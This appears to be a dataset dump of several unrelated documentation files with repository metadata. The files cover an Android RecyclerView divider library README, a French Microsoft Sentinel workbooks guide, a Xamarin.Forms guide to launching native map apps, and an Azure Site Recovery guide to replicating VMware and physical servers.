findViewById(R.id.recyclerview); recyclerView.addItemDecoration(new HorizontalDividerItemDecoration.Builder(this).build()); ``` If you want to set color, size and margin values, you can specify them as follows. ``` RecyclerView recyclerView = (RecyclerView) findViewById(R.id.recyclerview); recyclerView.addItemDecoration( new HorizontalDividerItemDecoration.Builder(this) .color(Color.RED) .sizeResId(R.dimen.divider) .marginResId(R.dimen.leftmargin, R.dimen.rightmargin) .build()); ``` Instead of setting color and size, you can set a paint object. ``` Paint paint = new Paint(); paint.setStrokeWidth(5); paint.setColor(Color.BLUE); paint.setAntiAlias(true); paint.setPathEffect(new DashPathEffect(new float[]{25.0f, 25.0f}, 0)); recyclerView.addItemDecoration( new HorizontalDividerItemDecoration.Builder(this).paint(paint).build()); ``` A 9-patch drawable can also be used for drawing the divider. 
``` RecyclerView recyclerView = (RecyclerView) findViewById(R.id.recyclerview); recyclerView.addItemDecoration(new HorizontalDividerItemDecoration.Builder(this) .drawable(R.drawable.sample) .size(15) .build()); ``` If you want to customize the divider depending on its position, implement the following interfaces. ### List of providers The following providers can be implemented to control each divider drawn between cells. - ColorProvider Provide the color for the divider - PaintProvider Provide the paint object for the divider line to draw. - DrawableProvider Provide the drawable object for the divider line - SizeProvider Provide the height for a horizontal divider, or the width for a vertical divider. - VisibilityProvider Enables you to control the visibility of dividers. - MarginProvider for horizontal divider (vertical list) Enables you to specify the left and right margin of the divider. - MarginProvider for vertical divider (horizontal list) Enables you to specify the top and bottom margin of the divider. Please refer to the ComplexAdapter class in the [sample](/sample/src/main/java/com/yqritc/recyclerviewflexibledivider/sample) for detailed usage of the providers. ### Optional The following method can be used if you want to draw a divider line after the last item in the RecyclerView. If you enable this, the range of the position parameter of the providers listed above is 0 to itemCount-1. Otherwise, the range is 0 to itemCount-2. ``` FlexibleDividerDecoration.Builder.showLastDivider ``` ### Note - When none of color, paint, or drawable is set, the default divider retrieved from android.R.attr.listDivider will be used. - When you set a Paint, you must use the setColor and setStrokeWidth methods of the Paint class. - If you want to use DashPathEffect, please note the following issue. https://code.google.com/p/android/issues/detail?id=29944 # License ``` Copyright 2015 yqritc Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ```
35.365079
187
0.770422
eng_Latn
0.915683
6f56f0bc392d011669e8e015954fb3b132efb9e8
9,046
md
Markdown
articles/sentinel/monitor-your-data.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
1
2021-03-12T23:37:08.000Z
2021-03-12T23:37:08.000Z
articles/sentinel/monitor-your-data.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/sentinel/monitor-your-data.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Visualisez vos données à l'aide des classeurs Azure Monitor dans Microsoft Sentinel | Microsoft Docs description: Apprenez à visualiser vos données à l'aide de classeurs dans Microsoft Sentinel. services: sentinel documentationcenter: na author: yelevin manager: rkarlin editor: '' ms.service: microsoft-sentinel ms.subservice: microsoft-sentinel ms.devlang: na ms.topic: how-to ms.tgt_pltfrm: na ms.workload: na ms.date: 11/09/2021 ms.author: yelevin ms.custom: ignite-fall-2021 ms.openlocfilehash: 525f67a7c9284a9ac78c388e52041d7895032104 ms.sourcegitcommit: 2ed2d9d6227cf5e7ba9ecf52bf518dff63457a59 ms.translationtype: HT ms.contentlocale: fr-FR ms.lasthandoff: 11/16/2021 ms.locfileid: "132522609" --- # <a name="use-azure-monitor-workbooks-to-visualize-and-monitor-your-data"></a>Utiliser des workbooks Azure Monitor pour visualiser et superviser vos données [!INCLUDE [Banner for top of topics](./includes/banner.md)] Une fois que vous avez [connecté vos sources de données](quickstart-onboard.md) à Microsoft Sentinel, vous pouvez visualiser et surveiller les données à l'aide de l'adoption par Microsoft Sentinel des classeurs Azure Monitor, qui offrent une grande souplesse dans la création de tableaux de bord personnalisés. Bien que les Workbooks soient affichés différemment dans Microsoft Sentinel, il peut être utile pour vous de voir comment [créer des rapports interactifs avec les Workbooks Azure Monitor](../azure-monitor/visualize/workbooks-overview.md). Microsoft Sentinel vous permet de créer des workbooks personnalisés à partir de vos données. Il est également fourni avec des modèles de classeurs intégrés qui vous permettent d'obtenir rapidement des informations sur vos données dès que vous connectez une source de données. Cet article décrit comment visualiser vos données dans Microsoft Sentinel. 
> [!div class="checklist"] > * Utiliser des classeurs intégrés > * Créer des classeurs ## <a name="prerequisites"></a>Prérequis Vous devez avoir au moins les droits de **lecteur de Workbook** ou de **contributeur de Workbook** sur le groupe de ressources de l'espace de travail Microsoft Sentinel. > [!NOTE] > Les workbooks que vous pouvez voir dans Microsoft Sentinel sont enregistrés dans le groupe de ressources de l'espace de travail Microsoft Sentinel et sont marqués par l'espace de travail dans lequel ils ont été créés. ## <a name="use-built-in-workbooks"></a>Utiliser des classeurs intégrés 1. Allez à **Workbooks** et sélectionnez ensuite **Modèles** pour voir la liste complète des workbooks intégrés à Microsoft Sentinel. Pour voir quels types de données sont pertinents pour les types de données que vous avez connectés, le champ **Types de données requis** de chaque workbook indiquera le type de données à côté d'une coche verte si vous transmettez déjà les données pertinentes à Microsoft Sentinel. [ ![Accédez aux classeurs.](media/tutorial-monitor-data/access-workbooks.png) ](media/tutorial-monitor-data/access-workbooks.png#lightbox) 1. Sélectionnez **Afficher le modèle** pour voir le modèle rempli avec vos données. 1. Pour modifier le classeur, sélectionnez **Enregistrer**, puis sélectionnez l’emplacement où vous souhaitez enregistrer le fichier JSON du modèle. > [!NOTE] > Cette opération crée une ressource Azure basée sur le modèle associé et enregistre le fichier JSON du modèle sans les données. 1. Sélectionnez **Afficher le classeur enregistré**. [ ![Affichez les classeurs.](media/tutorial-monitor-data/workbook-graph.png) ](media/tutorial-monitor-data/workbook-graph.png#lightbox) Sélectionnez le bouton **Modifier** de la barre d’outils du classeur pour personnaliser ce dernier en fonction de vos besoins. Lorsque vous avez terminé, sélectionnez **Enregistrer** pour enregistrer vos paramètres. 
Pour plus d’informations, consultez [Créer des rapports interactifs avec les classeurs Azure Monitor](../azure-monitor/visualize/workbooks-overview.md). > [!TIP] > Pour cloner votre classeur, sélectionnez **Modifier**, puis sélectionnez **Enregistrer sous**, en veillant à enregistrer le classeur sous un autre nom, dans le même abonnement et le même groupe de ressources. > Les classeurs clonés sont affichés sous l’onglet **Mes classeurs**. > ## <a name="create-new-workbook"></a>Créer un classeur 1. Accédez à **Classeurs**, puis sélectionnez **Ajouter un classeur** pour créer un classeur entièrement nouveau. [ ![Nouveau classeur.](media/tutorial-monitor-data/create-workbook.png) ](media/tutorial-monitor-data/create-workbook.png#lightbox) 1. Pour modifier le classeur, sélectionnez **Modifier**, puis ajoutez du texte, des requêtes et des paramètres selon vos besoins. Pour plus d’informations sur la personnalisation du classeur, consultez [Créer des rapports interactifs avec les classeurs Azure Monitor](../azure-monitor/visualize/workbooks-overview.md). 1. Quand vous créez une requête, assurez-vous que l’option **Source de données** est définie sur **Journaux** et **Type de ressource** sur **Log Analytics**, puis choisissez le ou les espaces de travail appropriés. 1. Après avoir créé votre workbook, enregistrez-le en veillant à l'enregistrer sous le groupe d'abonnement et de ressources de votre espace de travail Microsoft Sentinel. 1. Si vous voulez autoriser d’autres personnes de votre organisation à utiliser le classeur, sous **Enregistrer dans**, sélectionnez **Rapports partagés**. Si vous souhaitez restreindre l’usage de ce classeur à vous-seul, sélectionnez **Mes rapports**. 1. Pour passer d’un classeur à un autre dans votre espace de travail, sélectionnez **Ouvrir** ![Icône d’ouverture d’un classeur.](./media/tutorial-monitor-data/switch.png) dans la barre d’outils de n’importe quel classeur. 
L’écran bascule vers une liste de classeurs vers lesquels vous pouvez basculer. Sélectionnez le classeur que vous souhaitez ouvrir : [ ![Basculez entre les classeurs.](media/tutorial-monitor-data/switch-workbooks.png) ](media/tutorial-monitor-data/switch-workbooks.png#lightbox) ## <a name="refresh-your-workbook-data"></a>Actualiser les données de votre classeur Actualisez votre classeur pour afficher les données mises à jour. Dans la barre d’outils, sélectionnez l’une des options suivantes : - :::image type="icon" source="media/whats-new/manual-refresh-button.png" border="false"::: **Actualiser**, pour actualiser manuellement les données de votre classeur. - :::image type="icon" source="media/whats-new/auto-refresh-workbook.png" border="false"::: **Actualisation automatique**, pour définir l’actualisation automatique de votre classeur à un intervalle configuré. - Les intervalles d’actualisation automatique s’échelonnent entre **5 minutes** et **1 jour**. - L’actualisation automatique est suspendue lorsque vous modifiez un classeur, et les intervalles sont redémarrés chaque fois que vous revenez en mode d’affichage à partir du mode d’édition. - Les intervalles d’actualisation automatique sont également redémarrés si vous actualisez manuellement vos données. > [!TIP] > Par défaut, l’actualisation automatique est désactivée. Pour optimiser les performances, l’actualisation automatique est également désactivée chaque fois que vous fermez un classeur, et elle ne s’exécute pas en arrière-plan. Activez l’actualisation automatique en fonction de vos besoins la prochaine fois que vous ouvrirez le classeur. > ## <a name="print-a-workbook-or-save-as-pdf"></a>Imprimer un classeur ou enregistrer au format PDF Pour imprimer un classeur ou l’enregistrer au format PDF, utilisez le menu Options à droite du titre du classeur. 1. Sélectionnez Options > :::image type="icon" source="media/whats-new/print-icon.png" border="false"::: **Imprimer le contenu**. 2. 
Dans l’écran d’impression, ajustez vos paramètres d’impression si nécessaire ou sélectionnez **Enregistrer au format PDF** pour l’enregistrer localement. Exemple : [ ![Imprimez votre classeur ou enregistrez-le au format PDF.](media/whats-new/print-workbook.png) ](media/whats-new/print-workbook.png#lightbox) ## <a name="how-to-delete-workbooks"></a>Comment supprimer des classeurs Pour supprimer un classeur enregistré (soit un modèle enregistré ou un classeur personnalisé), dans la page Classeurs, sélectionnez le classeur enregistré à supprimer, puis sélectionnez **Supprimer**. Cette opération supprime le classeur enregistré. > [!NOTE] > Elle supprime le classeur, mais aussi toutes les modifications que vous avez apportées au modèle. Le modèle d’origine reste disponible. ## <a name="next-steps"></a>Étapes suivantes Dans cet article, vous avez appris à visualiser vos données dans Microsoft Sentinel, à l'aide des workbooks Azure. Pour savoir comment automatiser vos réponses aux menaces, voir [Configurer des réponses automatisées aux menaces dans Microsoft Sentinel](tutorial-respond-threats-playbook.md). Pour en savoir plus sur les workbooks intégrés les plus populaires, voir [Workbooks Microsoft Sentinel couramment utilisés](top-workbooks.md).
67.007407
825
0.785209
fra_Latn
0.98778
6f570cab9c96cf304e3affe6527cc928eccbcba5
4,899
md
Markdown
docs/xamarin-forms/user-interface/map/native-map-app.md
jedieaston/xamarin-docs
2105091f2eeb7844b19ae94708a6ab07e3e79bce
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/xamarin-forms/user-interface/map/native-map-app.md
jedieaston/xamarin-docs
2105091f2eeb7844b19ae94708a6ab07e3e79bce
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/xamarin-forms/user-interface/map/native-map-app.md
jedieaston/xamarin-docs
2105091f2eeb7844b19ae94708a6ab07e3e79bce
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: "Launch the Native Map App from Xamarin.Forms" description: "The native maps app on each platform can be launched from a Xamarin.Forms application by the Xamarin.Essentials Launcher class." ms.prod: xamarin ms.assetid: 5CF7CD67-3F20-4D80-B99E-D35A5FD1019A ms.technology: xamarin-forms author: davidbritch ms.author: dabritch ms.date: 10/30/2019 no-loc: [Xamarin.Forms, Xamarin.Essentials] --- # Launch the Native Map App from Xamarin.Forms [![Download Sample](~/media/shared/download.png) Download the sample](https://docs.microsoft.com/samples/xamarin/xamarin-forms-samples/workingwithmaps) The native map app on each platform can be launched from a Xamarin.Forms application by the Xamarin.Essentials `Launcher` class. This class enables an application to open another app through its custom URI scheme. The launcher functionality can be invoked with the `OpenAsync` method, passing in a `string` or `Uri` argument that represents the custom URL scheme to open. For more information about Xamarin.Essentials, see [Xamarin.Essentials](~/essentials/index.md?context=xamarin/xamarin-forms). > [!NOTE] > An alternative to using the Xamarin.Essentials `Launcher` class is to use its `Map` class. For more information, see [Xamarin.Essentials: Map](~/essentials/maps.md?context=xamarin/xamarin-forms). The maps app on each platform uses a unique custom URI scheme. For information about the maps URI scheme on iOS, see [Map Links](https://developer.apple.com/library/archive/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html) on developer.apple.com. For information about the maps URI scheme on Android, see [Maps Developer Guide](https://developer.android.com/guide/components/intents-common.html#Maps) and [Google Maps Intents for Android](https://developers.google.com/maps/documentation/urls/android-intents) on developers.android.com. 
For information about the maps URI scheme on the Universal Windows Platform (UWP), see [Launch the Windows Maps app](/windows/uwp/launch-resume/launch-maps-app).

## Launch the map app at a specific location

A location in the native maps app can be opened by adding appropriate query parameters to the custom URI scheme for each map app:

```csharp
if (Device.RuntimePlatform == Device.iOS)
{
    // https://developer.apple.com/library/ios/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html
    await Launcher.OpenAsync("http://maps.apple.com/?q=394+Pacific+Ave+San+Francisco+CA");
}
else if (Device.RuntimePlatform == Device.Android)
{
    // open the maps app directly
    await Launcher.OpenAsync("geo:0,0?q=394+Pacific+Ave+San+Francisco+CA");
}
else if (Device.RuntimePlatform == Device.UWP)
{
    await Launcher.OpenAsync("bingmaps:?where=394 Pacific Ave San Francisco CA");
}
```

This example code results in the native map app being launched on each platform, with the map centered on a pin representing the specified location:

[![Screenshot of native map app, on iOS and Android](native-map-app-images/location.png "Native map app")](native-map-app-images/location-large.png#lightbox "Native map app")

## Launch the map app with directions

The native maps app can be launched displaying directions, by adding appropriate query parameters to the custom URI scheme for each map app:

```csharp
if (Device.RuntimePlatform == Device.iOS)
{
    // https://developer.apple.com/library/ios/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html
    await Launcher.OpenAsync("http://maps.apple.com/?daddr=San+Francisco,+CA&saddr=cupertino");
}
else if (Device.RuntimePlatform == Device.Android)
{
    // opens the 'task chooser' so the user can pick Maps, Chrome or other mapping app
    await Launcher.OpenAsync("http://maps.google.com/?daddr=San+Francisco,+CA&saddr=Mountain+View");
}
else if (Device.RuntimePlatform == Device.UWP)
{
    await Launcher.OpenAsync("bingmaps:?rtp=adr.394 Pacific Ave San Francisco CA~adr.One Microsoft Way Redmond WA 98052");
}
```

This example code results in the native map app being launched on each platform, with the map centered on a route between the specified locations:

[![Screenshot of native map app route, on iOS and Android](native-map-app-images/directions.png "Native map app directions")](native-map-app-images/directions-large.png#lightbox "Native map app directions")

## Related links

- [Maps Sample](https://docs.microsoft.com/samples/xamarin/xamarin-forms-samples/workingwithmaps)
- [Xamarin.Essentials](~/essentials/index.md?context=xamarin/xamarin-forms)
- [Map Links](https://developer.apple.com/library/archive/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html)
- [Maps Developer Guide](https://developer.android.com/guide/components/intents-common.html#Maps)
- [Google Maps Intents for Android](https://developers.google.com/maps/documentation/)
- [Launch the Windows Maps app](/windows/uwp/launch-resume/launch-maps-app)
---
title: Replicate VMware virtual machines and physical servers to Azure with Azure Site Recovery | Microsoft Docs
description: This article describes how to deploy Azure Site Recovery to orchestrate replication, failover and recovery of on-premises VMware virtual machines and Windows/Linux physical servers to Azure.
services: site-recovery
documentationcenter: ''
author: rayne-wiselman
manager: jwhit
editor: ''

ms.assetid: a9022c1f-43c1-4d38-841f-52540025fb46
ms.service: site-recovery
ms.workload: backup-recovery
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 09/29/2016
ms.author: raynew

---
# Replicate VMware virtual machines and physical servers to Azure with Azure Site Recovery
> [!div class="op_single_selector"]
> * [Azure Portal](site-recovery-vmware-to-azure.md)
> * [Classic Portal](site-recovery-vmware-to-azure-classic.md)
> * [Classic Portal (legacy)](site-recovery-vmware-to-azure-classic-legacy.md)
>
>

The Azure Site Recovery service contributes to your business continuity and disaster recovery (BCDR) strategy by orchestrating replication, failover, and recovery of virtual machines and physical servers. Machines can be replicated to Azure, or to a secondary on-premises data center. For a quick overview, read [What is Azure Site Recovery?](site-recovery-overview.md).

## Overview
This article describes how to:

* **Replicate VMware virtual machines to Azure**—Deploy Site Recovery to coordinate replication, failover, and recovery of on-premises VMware virtual machines to Azure storage.
* **Replicate physical servers to Azure**—Deploy Azure Site Recovery to coordinate replication, failover, and recovery of on-premises physical Windows and Linux servers to Azure.

> [!NOTE]
> This article describes how to replicate to Azure. If you want to replicate VMware VMs or Windows/Linux physical servers to a secondary datacenter, follow the instructions in [this article](site-recovery-vmware-to-vmware.md).
>
>

Post any comments or questions at the bottom of this article, or on the [Azure Recovery Services Forum](https://social.msdn.microsoft.com/forums/azure/home?forum=hypervrecovmgr).

## Enhanced deployment
This article contains instructions for an enhanced deployment in the classic Azure portal. We recommend you use this version for all new deployments. If you've already deployed using the earlier legacy version, we recommend that you migrate to the new version. Read [more](site-recovery-vmware-to-azure-classic-legacy.md#migrate-to-the-enhanced-deployment) about migration.

The enhanced deployment is a major update. Here's a summary of the improvements we've made:

* **No infrastructure VMs in Azure**: Data replicates directly to an Azure storage account. In addition, for replication and failover there's no need to set up any infrastructure VMs (configuration server, master target server) as we needed in the legacy deployment.
* **Unified installation**: A single installation provides simple setup and scalability for on-premises components.
* **Secure deployment**: All traffic is encrypted, and replication management communications are sent over HTTPS 443.
* **Recovery points**: Support for crash and application-consistent recovery points for Windows and Linux environments, and for both single VM and multi-VM consistent configurations.
* **Test failover**: Support for non-disruptive test failover to Azure, without impacting production or pausing replication.
* **Unplanned failover**: Support for unplanned failover to Azure, with an enhanced option to shut down VMs automatically before failover.
* **Failback**: Integrated failback that replicates only delta changes back to the on-premises site.
* **vSphere 6.0**: Limited support for VMware vSphere 6.0 deployments.

## How does Site Recovery help protect virtual machines and physical servers?
* VMware administrators can configure off-site protection to Azure of business workloads and applications running on VMware virtual machines. Server managers can replicate physical on-premises Windows and Linux servers to Azure.
* The Azure Site Recovery console provides a single location for simple setup and management of replication, failover, and recovery processes.
* If you replicate VMware virtual machines that are managed by a vCenter server, Site Recovery can discover those VMs automatically. If machines are on an ESXi host, Site Recovery discovers VMs on the host.
* Run easy failovers from your on-premises infrastructure to Azure, and failback (restore) from Azure to VMware VM servers in the on-premises site.
* Configure recovery plans that group together application workloads that are tiered across multiple machines. You can fail over those plans, and Site Recovery provides multi-VM consistency so that machines running the same workloads can be recovered together to a consistent data point.

## Supported Operating Systems
### Windows (64-bit only)
* Windows Server 2008 R2 SP1+
* Windows Server 2012
* Windows Server 2012 R2

### Linux (64-bit only)
* Red Hat Enterprise Linux 6.7, 7.1, 7.2
* CentOS 6.5, 6.6, 6.7, 7.0, 7.1, 7.2
* Oracle Enterprise Linux 6.4, 6.5 running either the Red Hat compatible kernel or Unbreakable Enterprise Kernel Release 3 (UEK3)
* SUSE Linux Enterprise Server 11 SP3

## Scenario architecture
Scenario components:

* **An on-premises management server**: The management server runs Site Recovery components:
  * **Configuration server**: Coordinates communication and manages data replication and recovery processes.
  * **Process server**: Acts as a replication gateway. It receives data from protected source machines, optimizes it with caching, compression, and encryption, and sends replication data to Azure storage. It also handles push installation of the Mobility service to protected machines and performs automatic discovery of VMware VMs.
  * **Master target server**: Handles replication data during failback from Azure.

  You can also deploy a management server that acts as a process server only, in order to scale your deployment.
* **The Mobility service**: This component is deployed on each machine (VMware VM or physical server) that you want to replicate to Azure. It captures data writes on the machine and forwards them to the process server.
* **Azure**: You don't need to create any Azure VMs to handle replication and failover. The Site Recovery service handles data management, and data replicates directly to Azure storage. Replicated Azure VMs are spun up automatically only when failover to Azure occurs. However, if you want to fail back from Azure to the on-premises site you will need to set up an Azure VM to act as a process server.

The graphic shows how these components interact.

![architecture](./media/site-recovery-vmware-to-azure/v2a-architecture-henry.png)

**Figure 1: VMware/physical to Azure** (created by Henry Robalino)

## Capacity planning
When you're planning capacity, here's what you need to think about:

* **The source environment**—Capacity planning for the VMware infrastructure and source machine requirements.
* **The management server**—Planning for the on-premises management servers that run Site Recovery components.
* **Network bandwidth from source to target**—Planning for the network bandwidth required for replication between the source and Azure.

### Source environment considerations
* **Maximum daily change rate**—A protected machine can only use one process server, and a single process server can handle up to 2 TB of data change per day. Thus 2 TB is the maximum daily data change rate that's supported for a protected machine.
* **Maximum throughput**—A replicated machine can belong to one storage account in Azure. A standard storage account can handle a maximum of 20,000 requests per second, and we recommend that you keep the number of IOPS across a source machine to 20,000.
For example, if you have a source machine with 5 disks and each disk generates 120 IOPS (8K size) on the source, then it will be within the Azure per-disk IOPS limit of 500. The number of storage accounts required = total source IOPS/20,000.

### Management server considerations
The management server runs Site Recovery components that handle data optimization, replication, and management. It should be able to handle the daily change rate capacity across all workloads running on protected machines, and have sufficient bandwidth to continuously replicate data to Azure storage. Specifically:

* The process server receives replication data from protected machines, and optimizes it with caching, compression, and encryption before sending it to Azure. The management server should have sufficient resources to perform these tasks.
* The process server uses a disk-based cache. We recommend a separate cache disk of 600 GB or more to handle data changes stored in the event of a network bottleneck or outage. During deployment you can configure the cache on any drive that has at least 5 GB of storage available, but 600 GB is the minimum recommendation.
* As a best practice we recommend that the management server be located on the same network and LAN segment as the machines you want to protect. It can be located on a different network, but machines you want to protect should have L3 network visibility to it.

Size recommendations for the management server are summarized in the following table.

| **Management server CPU** | **Memory** | **Cache disk size** | **Data change rate** | **Protected machines** |
| --- | --- | --- | --- | --- |
| 8 vCPUs (2 sockets * 4 cores @ 2.5GHz) |16 GB |300 GB |500 GB or less |Deploy a management server with these settings to replicate less than 100 machines. |
| 12 vCPUs (2 sockets * 6 cores @ 2.5GHz) |18 GB |600 GB |500 GB to 1 TB |Deploy a management server with these settings to replicate between 100-150 machines. |
| 16 vCPUs (2 sockets * 8 cores @ 2.5GHz) |32 GB |1 TB |1 TB to 2 TB |Deploy a management server with these settings to replicate between 150-200 machines. |
| Deploy another process server | | |> 2 TB |Deploy additional process servers if you're replicating more than 200 machines, or if the daily data change rate exceeds 2 TB. |

Where:

* Each source machine is configured with 3 disks of 100 GB each.
* We used benchmarking storage of 8 SAS drives of 10K RPM with RAID 10 for cache disk measurements.

### Network bandwidth from source to target
Make sure you calculate the bandwidth that would be required for initial replication and delta replication using the [capacity planner tool](site-recovery-capacity-planner.md).

#### Throttling bandwidth used for replication
VMware traffic replicated to Azure goes through a specific process server. You can throttle the bandwidth that's available for Site Recovery replication on that server as follows:

1. Open the Microsoft Azure Backup MMC snap-in on the main management server or on a management server running additional provisioned process servers. By default a shortcut for Microsoft Azure Backup is created on the desktop, or you can find it in: C:\Program Files\Microsoft Azure Recovery Services Agent\bin\wabadmin.
2. In the snap-in click **Change Properties**.

    ![Throttle bandwidth](./media/site-recovery-vmware-to-azure-classic/throttle1.png)
3. On the **Throttling** tab specify the bandwidth that can be used for Site Recovery replication and the applicable scheduling.

    ![Throttle bandwidth](./media/site-recovery-vmware-to-azure-classic/throttle2.png)

Optionally you can also set throttling using PowerShell. Here's an example:

    Set-OBMachineSetting -WorkDay $mon, $tue -StartWorkHour "9:00:00" -EndWorkHour "18:00:00" -WorkHourBandwidth (512*1024) -NonWorkHourBandwidth (2048*1024)

#### Maximizing bandwidth usage
To increase the bandwidth utilized for replication by Azure Site Recovery you would need to change a registry key.
The following key controls the number of threads per replicating disk that are used when replicating:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Azure Backup\Replication\UploadThreadsPerVM

In an "overprovisioned" network, this registry key needs to be changed from its default values. We support a maximum of 32. [Learn more](site-recovery-capacity-planner.md) about detailed capacity planning.

### Additional process servers
If you need to protect more than 200 machines, or the daily change rate is greater than 2 TB, you can add additional servers to handle the load. To scale out you can:

* Increase the number of management servers. For example you can protect up to 400 machines with two management servers.
* Add additional process servers and use these to handle traffic instead of (or in addition to) the management server.

This table describes a scenario in which:

* You set up the original management server to use it as a configuration server only.
* You set up an additional process server.
* You configure protected virtual machines to use the additional process server.
* Each protected source machine is configured with three disks of 100 GB each.

| **Original management server**<br/><br/>(configuration server) | **Additional process server** | **Cache disk size** | **Data change rate** | **Protected machines** |
| --- | --- | --- | --- | --- |
| 8 vCPUs (2 sockets * 4 cores @ 2.5GHz), 16 GB memory |4 vCPUs (2 sockets * 2 cores @ 2.5GHz), 8 GB memory |300 GB |250 GB or less |You can replicate 85 or less machines. |
| 8 vCPUs (2 sockets * 4 cores @ 2.5GHz), 16 GB memory |8 vCPUs (2 sockets * 4 cores @ 2.5GHz), 12 GB memory |600 GB |250 GB to 1 TB |You can replicate between 85-150 machines. |
| 12 vCPUs (2 sockets * 6 cores @ 2.5GHz), 18 GB memory |12 vCPUs (2 sockets * 6 cores @ 2.5GHz), 24 GB memory |1 TB |1 TB to 2 TB |You can replicate between 150-225 machines. |

The way in which you scale your servers will depend on your preference for a scale-up or scale-out model. You scale up by deploying a few high-end management and process servers, or scale out by deploying more servers with fewer resources. For example, if you need to protect 220 machines you could do either of the following:

* Configure the original management server with 12 vCPUs and 18 GB of memory, plus an additional process server with 12 vCPUs and 24 GB of memory, and configure protected machines to use the additional process server only.
* Or alternatively, you could configure two management servers (2 x 8 vCPUs, 16 GB RAM) and two additional process servers (1 x 8 vCPUs and 1 x 4 vCPUs to handle 135 + 85 (220) machines), and configure protected machines to use the additional process servers only.

[Follow these instructions](#deploy-additional-process-servers) to set up an additional process server.

## Before you start deployment
The tables summarize the prerequisites for deploying this scenario.

### Azure prerequisites
| **Prerequisite** | **Details** |
| --- | --- |
| **Azure account** |You'll need a [Microsoft Azure](https://azure.microsoft.com/) account. You can start with a [free trial](https://azure.microsoft.com/pricing/free-trial/). [Learn more](https://azure.microsoft.com/pricing/details/site-recovery/) about Site Recovery pricing. |
| **Azure storage** |You'll need an Azure storage account to store replicated data. Replicated data is stored in Azure storage and Azure VMs are spun up when failover occurs.<br/><br/>You need a [standard geo-redundant storage account](../storage/storage-redundancy.md#geo-redundant-storage). The account must be in the same region as the Site Recovery service, and be associated with the same subscription. Note that replication to premium storage accounts isn't currently supported and shouldn't be used.<br/><br/>We do not support the move of storage accounts created using the [new Azure portal](../storage/storage-create-storage-account.md) across resource groups. [Read about](../storage/storage-introduction.md) Azure storage. |
| **Azure network** |You'll need an Azure virtual network that Azure VMs will connect to when failover occurs. The Azure virtual network must be in the same region as the Site Recovery vault.<br/><br/>Note that to fail back after failover to Azure you'll need a VPN connection (or Azure ExpressRoute) set up from the Azure network to the on-premises site. |

### On-premises prerequisites
| **Prerequisite** | **Details** |
| --- | --- |
| **Management server** |You need an on-premises Windows 2012 R2 server running on a virtual machine or physical server. All of the on-premises Site Recovery components are installed on this management server.<br/><br/>We recommend you deploy the server as a highly available VMware VM. Failback to the on-premises site from Azure is always to VMware VMs, regardless of whether you failed over VMs or physical servers.
If you don't configure the Management server as a VMware VM you'll need to set up a separate master target server as a VMware VM to receive failback traffic.<br/><br/>The server should not be a Domain Controller.<br/><br/>The server should have a static IP address.<br/><br/>The host name of the server should be 15 characters or less.<br/><br/>The operating system locale should be English only.<br/><br/>The management server requires internet access.<br/><br/>You need outbound access from the server as follows: Temporary access on HTTP 80 during setup of the Site Recovery components (to download MySQL); Ongoing outbound access on HTTPS 443 for replication management; Ongoing outbound access on HTTPS 9443 for replication traffic (this port can be modified)<br/><br/> Make sure these URLs are accessible from the management server: <br/>- \*.hypervrecoverymanager.windowsazure.com<br/>- \*.accesscontrol.windows.net<br/>- \*.backup.windowsazure.com<br/>- \*.blob.core.windows.net<br/>- \*.store.core.windows.net<br/>-https://www.msftncsi.com/ncsi.txt<br/>- [ https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi](https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi " https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi")<br/><br/>If you have IP address-based firewall rules on the server, check that the rules allow communication to Azure. You'll need to allow the [Azure Datacenter IP Ranges](https://www.microsoft.com/download/details.aspx?id=41653) and the HTTPS (443) port. You'll also need to white list IP address ranges for the Azure region of your subscription, and for West US. The URL [https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi](https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi " https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi") is for downloading MySQL. 
|
| **VMware vCenter/ESXi host** |You need one or more VMware vSphere ESX/ESXi hypervisors managing your VMware virtual machines, running ESX/ESXi version 6.0, 5.5 or 5.1 with the latest updates.<br/><br/>We recommend you deploy a VMware vCenter server to manage your ESXi hosts. It should be running vCenter version 6.0 or 5.5 with the latest updates.<br/><br/>Note that Site Recovery doesn't support new vCenter and vSphere 6.0 features such as cross vCenter vMotion, virtual volumes, and storage DRS. Site Recovery support is limited to features that were also available in version 5.5. |
